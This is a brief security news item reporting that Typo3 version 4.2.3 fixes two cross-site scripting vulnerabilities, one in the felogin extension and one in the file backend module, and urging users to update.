Security update for Typo3
Version 4.2.3 of the Typo3 content management system deals with two cross-site scripting vulnerabilities that allow an attacker to inject and execute JavaScript. The attacker would normally exploit the vulnerability to steal access data. The bugs are located in the felogin
system extension and the file
backend module. The felogin
vulnerability can be exploited simply by tricking a user to follow a specially crafted link. However, the developers claim that the bug in file
can only be exploited if the target is a backend user or if the attacker is in possession of information about the server's web folder structure. Versions 4.2.x are affected. Users of the felogin
extension should update their system as soon as possible. Earlier this week, a collective security bulletin was issued describing vulnerabilities in a number of Typo3 third party extensions.
See also
- Cross-Site Scripting vulnerability in TYPO3 Core (1), security advisory at typo3.org
- Cross-Site Scripting vulnerability in TYPO3 Core (2), security advisory at typo3.org
- Several vulnerabilities in third party extensions, security advisory at typo3.org
(djwm)